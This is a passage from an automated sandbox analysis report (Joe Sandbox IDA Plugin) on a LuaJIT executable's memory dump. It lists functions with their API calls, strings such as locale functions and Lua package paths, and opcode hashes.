                                                                                                                                                                        • Instruction Fuzzy Hash: 74910323F1865366EB20FF35840127AE752EB80BD4F944131EA8C4BAD5DF3ED442A75A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B09934 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocaletry_get_function
                                                                                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                                                                                        • API String ID: 2200034068-2904428671
                                                                                                                                                                        • Opcode ID: cedeff604e51c5c39958de497cab3e5388dd21419572c7ffd9defd6c3c48ed15
                                                                                                                                                                        • Instruction ID: 0813b2ea1818b5f3e2647c82a13193012f2c6a670f8b669de6a31c565c2376f9
                                                                                                                                                                        • Opcode Fuzzy Hash: cedeff604e51c5c39958de497cab3e5388dd21419572c7ffd9defd6c3c48ed15
                                                                                                                                                                        • Instruction Fuzzy Hash: B901F922B08B87A1E710EB51B4404AAE360FF95BC0FD44035EE5C13B59CF3ED901979A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738ABEE80 Relevance: 3.0, APIs: 2, Instructions: 36windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                                                        • Opcode ID: e43a0246ca48c036b89a1bc6ecf8a36f86f99c51f42af5f9ead38ad86180ded0
                                                                                                                                                                        • Instruction ID: 29760e7bb63ad651c30eef6eb4885f1d1560c7f19bb11e1fb48ba7901b2a9e23
                                                                                                                                                                        • Opcode Fuzzy Hash: e43a0246ca48c036b89a1bc6ecf8a36f86f99c51f42af5f9ead38ad86180ded0
                                                                                                                                                                        • Instruction Fuzzy Hash: 14114832609A8292E760EB54F44475AF7A0FBC5380F908536EA8D43B68DF7ED0589B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B09D50 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09D6B
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09D8A
                                                                                                                                                                          • Part of subcall function 00007FF738B09378: GetProcAddress.KERNEL32(?,?,00000002,00007FF738B09856,?,?,?,00007FF738B0AB66,?,?,?,00007FF738AFAF01), ref: 00007FF738B094D0
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09DA9
                                                                                                                                                                          • Part of subcall function 00007FF738B09378: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF738B09856,?,?,?,00007FF738B0AB66,?,?,?,00007FF738AFAF01), ref: 00007FF738B0941B
                                                                                                                                                                          • Part of subcall function 00007FF738B09378: GetLastError.KERNEL32(?,?,00000002,00007FF738B09856,?,?,?,00007FF738B0AB66,?,?,?,00007FF738AFAF01), ref: 00007FF738B09429
                                                                                                                                                                          • Part of subcall function 00007FF738B09378: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF738B09856,?,?,?,00007FF738B0AB66,?,?,?,00007FF738AFAF01), ref: 00007FF738B0946B
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09DC8
                                                                                                                                                                          • Part of subcall function 00007FF738B09378: FreeLibrary.KERNEL32(?,?,00000002,00007FF738B09856,?,?,?,00007FF738B0AB66,?,?,?,00007FF738AFAF01), ref: 00007FF738B094A4
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09DE7
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09E06
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09E25
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09E44
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09E63
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09E82
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                        • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                                        • API String ID: 3255926029-3252031757
                                                                                                                                                                        • Opcode ID: f4f064dfd8f8160fec77be139e6c26641e1cf4b0400fa2d82c480ab4ae69d6c5
                                                                                                                                                                        • Instruction ID: ccaf10a8387b0b2c3c42579d3e15ea176ff79a9c6e7d5fddadc72b6a5a9a9571
                                                                                                                                                                        • Opcode Fuzzy Hash: f4f064dfd8f8160fec77be139e6c26641e1cf4b0400fa2d82c480ab4ae69d6c5
                                                                                                                                                                        • Instruction Fuzzy Hash: D23186A2948A8FB0F604FBA0E8615F5E321AF04355FC04533D01D521B58F7FA64AE7AB
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A78590 Relevance: 33.4, APIs: 2, Strings: 17, Instructions: 117COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcsxfrm$_free_nolock
                                                                                                                                                                        • String ID: .\?.dll;!\?.dll;!\loadall.dll$.\?.lua;!\lua\?.lua;!\lua\?\init.lua;$LUA_CPATH$LUA_NOENV$LUA_PATH$\;?!-$_LOADED$_LOADLIB$_PRELOAD$__gc$config$cpath$loaded$loaders$package$path$preload
                                                                                                                                                                        • API String ID: 338564694-1474762456
                                                                                                                                                                        • Opcode ID: 567adbf67685013490825193ac147204f22a5be4c67c6fdfc6ce4f3ce722572e
                                                                                                                                                                        • Instruction ID: ca08aa9e04e3b91c9b828b872c4fe5d71470b382ffaa0eb2e2377458a620f71f
                                                                                                                                                                        • Opcode Fuzzy Hash: 567adbf67685013490825193ac147204f22a5be4c67c6fdfc6ce4f3ce722572e
                                                                                                                                                                        • Instruction Fuzzy Hash: CE518823A29986A2E610FB65E8416AAE360FBC4750FC00132F55D477AACFBED501E758
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A47CA0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 174COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcsxfrm
                                                                                                                                                                        • String ID: %s:$...$[builtin#%d]:$ at %p$ in function '%s'$ in function <%s:%d>$ in main chunk$%d:$%s$Snlf$stack traceback:
                                                                                                                                                                        • API String ID: 1214967616-750625491
                                                                                                                                                                        • Opcode ID: dad8c19f1df65b98f19272fbb915c4e626c507869c5506c0b5815d88a20289f3
                                                                                                                                                                        • Instruction ID: ae2ce6b804271d3504296101ca1f8292a1540f423a9837d605d5800404f0badc
                                                                                                                                                                        • Opcode Fuzzy Hash: dad8c19f1df65b98f19272fbb915c4e626c507869c5506c0b5815d88a20289f3
                                                                                                                                                                        • Instruction Fuzzy Hash: 58916A23618AD695DB70EB15E4807AEF7A0F7C8780F844532DA9E83B68CE7ED440DB14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A77E50 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 225COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_nolockwcsftime
                                                                                                                                                                        • String ID: day$hour$isdst$min$month$sec$wday$yday$year
                                                                                                                                                                        • API String ID: 793903186-297742768
                                                                                                                                                                        • Opcode ID: d6203fc2d73f083a27cf039ce36135fa900140a4ee96df02599a6a17a1fe6fb6
                                                                                                                                                                        • Instruction ID: 88e98bc6b9f9694f37a2d8c75e5810d7456efbf61043e77a9e46cddc40bd8c3b
                                                                                                                                                                        • Opcode Fuzzy Hash: d6203fc2d73f083a27cf039ce36135fa900140a4ee96df02599a6a17a1fe6fb6
                                                                                                                                                                        • Instruction Fuzzy Hash: 5AC13A33619B8595DB20EB56E48076AF7A0FBC9B91F900122EA8D83B69DF3DD440DB14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A5E5D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 52libraryloaderthreadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                                                                                                                                                                        • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                                                                                                                                                                        • API String ID: 4260375681-184456188
                                                                                                                                                                        • Opcode ID: cc04c540dfdcd993c93d582994d185e799fa4b9f9365148040414810b697b9ff
                                                                                                                                                                        • Instruction ID: 4fcbf508592331810c3a61ed89acd594a80f372d6574522eabbf039c944dbde8
                                                                                                                                                                        • Opcode Fuzzy Hash: cc04c540dfdcd993c93d582994d185e799fa4b9f9365148040414810b697b9ff
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B21E837608B8692EB10DB09E48436AB371F785B84FA00136DA8D47764DF3ED885D708
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0215C Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 479COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: -$f$p$p
                                                                                                                                                                        • API String ID: 3215553584-2516539321
                                                                                                                                                                        • Opcode ID: 2e035ac35fe9b102a8f7191a604ce257ebae7614de89db9076753e014526f37d
                                                                                                                                                                        • Instruction ID: 72bba48fc5395a7f3f76a4a3ad551aa06e99bb7e6792e4910c3c4efa1d986917
                                                                                                                                                                        • Opcode Fuzzy Hash: 2e035ac35fe9b102a8f7191a604ce257ebae7614de89db9076753e014526f37d
                                                                                                                                                                        • Instruction Fuzzy Hash: 5C12E7A3E0C14395FB26BA34D054A7DF652EB40764FD44131D6F9066C5CB3EE888A72B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AE0144 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                                                                        • Opcode ID: 21daca37c64a951625de81c52c05d4c1e6152d44712894eceea29e405e421fc1
                                                                                                                                                                        • Instruction ID: 3a657b771217d9192cb1e8fddf7af55e835b1aef6cf460db602b2981da7e5daa
                                                                                                                                                                        • Opcode Fuzzy Hash: 21daca37c64a951625de81c52c05d4c1e6152d44712894eceea29e405e421fc1
                                                                                                                                                                        • Instruction Fuzzy Hash: 29E1DF73A097469AEB20AF64D4507ADF7A0FB45B88F805536EE8D47B45CF39E080E724
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738ADF3FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF738ADF6AE,?,?,?,00007FF738ADF3A0,?,?,00000001,00007FF738ADF135), ref: 00007FF738ADF481
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF738ADF6AE,?,?,?,00007FF738ADF3A0,?,?,00000001,00007FF738ADF135), ref: 00007FF738ADF48F
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF738ADF6AE,?,?,?,00007FF738ADF3A0,?,?,00000001,00007FF738ADF135), ref: 00007FF738ADF4B9
                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF738ADF6AE,?,?,?,00007FF738ADF3A0,?,?,00000001,00007FF738ADF135), ref: 00007FF738ADF4FF
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF738ADF6AE,?,?,?,00007FF738ADF3A0,?,?,00000001,00007FF738ADF135), ref: 00007FF738ADF50B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                                                                        • Opcode ID: c3afe34d56b073810ade250f6c7973b9ef5f886303c28095954288b42dbd8d7d
                                                                                                                                                                        • Instruction ID: 9d5ebc34824a6ae907327a4961bf6dbd3622a32eb1058fcfa415b8038b617200
                                                                                                                                                                        • Opcode Fuzzy Hash: c3afe34d56b073810ade250f6c7973b9ef5f886303c28095954288b42dbd8d7d
                                                                                                                                                                        • Instruction Fuzzy Hash: C031CA63A1B742A2EE15FB02A420A76E2D4FF08BA0F891535DD1D87355DF3EE0459329
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B1F1B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                        • Opcode ID: b0ca9c991d90a88812005bb169e0b0acbdb3826b13817d58da2bb6e22e5a5c46
                                                                                                                                                                        • Instruction ID: af8bde53efd4eff783f4040136d7d8eb058943c8518dd5b4a431a02d4bd993d4
                                                                                                                                                                        • Opcode Fuzzy Hash: b0ca9c991d90a88812005bb169e0b0acbdb3826b13817d58da2bb6e22e5a5c46
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E119622718A8796E7509B52F844329E2A0FB88FE4F844234ED5D877A8CF3DD5049759
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A46760 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 386COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: =[C]$Lua$main
                                                                                                                                                                        • API String ID: 0-2004024069
                                                                                                                                                                        • Opcode ID: 98888c1c1b4fbd91893acc06f877c56911a3da836486efa45674046b72bb33cb
                                                                                                                                                                        • Instruction ID: ff1dec56d8d0c4e1335bd20ccc48312bfa4c2852e832ea3afb67f910105a2988
                                                                                                                                                                        • Opcode Fuzzy Hash: 98888c1c1b4fbd91893acc06f877c56911a3da836486efa45674046b72bb33cb
                                                                                                                                                                        • Instruction Fuzzy Hash: 72221733609B9585EB70DB19E0807AEFBA0F788B90F544126DA9D83BA8DF3DD440DB14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

